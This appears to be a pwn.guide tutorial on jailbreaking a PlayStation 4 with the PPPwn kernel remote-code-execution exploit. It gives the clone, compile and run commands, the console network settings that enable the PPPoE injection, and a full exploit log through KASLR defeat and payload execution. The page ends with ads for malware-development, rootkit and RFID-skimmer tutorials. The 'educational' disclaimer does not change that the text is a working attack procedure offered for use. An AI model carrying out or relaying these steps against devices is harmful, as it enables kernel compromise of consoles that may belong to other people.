pwn.guide
Hardware Hacking

How to jailbreak a PS4 using PPPwn

How someone could jailbreak your PlayStation 4 using PPPwn


This tutorial covers using PPPwn on Linux and installing GoldHEN on a PS4.

Part 1: Using PPPwn on Linux

PPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. The code bellow is a modified proof-of-concept exploit for CVE-2006-4304 that was reported to PlayStation. This section will guide you through the installation and usage of PPPwn on a Linux system.

Prerequisites

Before you begin, ensure you have the following:

  • A Linux distribution (e.g., Ubuntu, Debian, Fedora)
  • Root or sudo privileges
  • Basic knowledge of networking and Linux
  • A PlayStation 4 on firmware version 9.00 or 11.00

Installation

Step 1: Update Your System & Install Dependencies

First, update your system's package list and upgrade any outdated packages. Then install python3 and gcc.

sudo apt update
sudo apt upgrade
sudo apt install -y git python3 gcc

Step 2: Clone the PPPwn Repository

Next, clone the PPPwn repository from GitHub.

git clone --recursive https://github.com/TheOfficialFloW/PPPwn
cd PPPwn

Step 3: Install Python Dependencies

Install the required Python packages using pip.

sudo pip install -r requirements.txt

Step 4: Compile the stage1 .bin

make -C stage1 FW=YOURFWVERSION clean && make -C stage1 FW=1100

Replace the YOURFWVERSION with your PS4's version (Example: 1100, 900...).

Setting up GoldHen

Now you need to go to https://github.com/GoldHEN/GoldHEN/releases and click on Assets at the latest pre-release & click download.

Step 2: Extract the .bin from the archive

After you've downloaded the .7z file Here's an example, go to the pppwn_stage2 folder and select the .bin that matches your firmware. Then move the .bin and rename it to .../PPPwn/stage2/stage2.bin.

Step 3: Move the goldhen.bin file to a USB stick

In the archive, you will find a file, named goldhen.bin, which you will have to move to a exFAT formatted USB stick, into it's root directory.

Run the final commands!

Now you will need to do the following on your PS4:

  • Connect an Ethernet cable from your PC to your PS4
  • Go to Settings and then Network
  • Select Set Up Internet connection and choose Use a LAN Cable
  • Choose Custom setup and choose PPPoE for IP Address Settings
  • Enter anything for PPPoE User ID and PPPoE Password
  • Choose Automatic for DNS Settings and MTU Settings
  • Choose Do Not Use for Proxy Server

After you did all of that, press the Test Internet Connection button and run the following command at the same time:

sudo python3 pppwn.py --interface=YOURINTERFACE --fw=YOURFWVERSION

Change the YOURINTERFACE with your network interface (example: eth0) and enter your firmware version.

ALWAYS wait for the console to show the message "Cannot connect to network: (NW-31274-7)" before trying this PPPOE injection again.

[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=eth0 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
 
[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
 
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
 
[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
 
[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
 
[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!

Keep in mind that it can take up to 30x of repeating the process for you to finally get it working!

For educational purposes only. We do not condome any illegal activity. The tutorial is meant for people to learn on how to avoid bad people hacking their PS4 consoles and stealing their data.

Upgrade to pwn.guide+ today and access tutorials like:


Modify Firmware Data

Learn how to modify device firmwares & even write them using a CH341A.

November 23, 2024

View Tutorial

Malware Development Full Course

Learn how someone could develop malware.

August 3, 2024

View Tutorial

Rootkits Explained With A PoC

Learn how rootkits work, along with a sample rootkit's code.

August 2, 2024

View Tutorial

RETBleed CPU Attack Explained with PoC

Learn how the RETBleed attack works with an example PoC.

June 17, 2024

View Tutorial

How to Exploit Git For RCE using git clone

How to exploit git to execute commands remotely when someone clones your repo.

June 16, 2024

View Tutorial

Cold Boot Attack Tutorial

How to dump the memory of a machine & get secrets from it.

June 8, 2024

View Tutorial

Build a DIY RFID Skimmer

Learn how to build a DIY RFID skimmer using an Arduino and an RFID reader module.

May 31, 2024

View Tutorial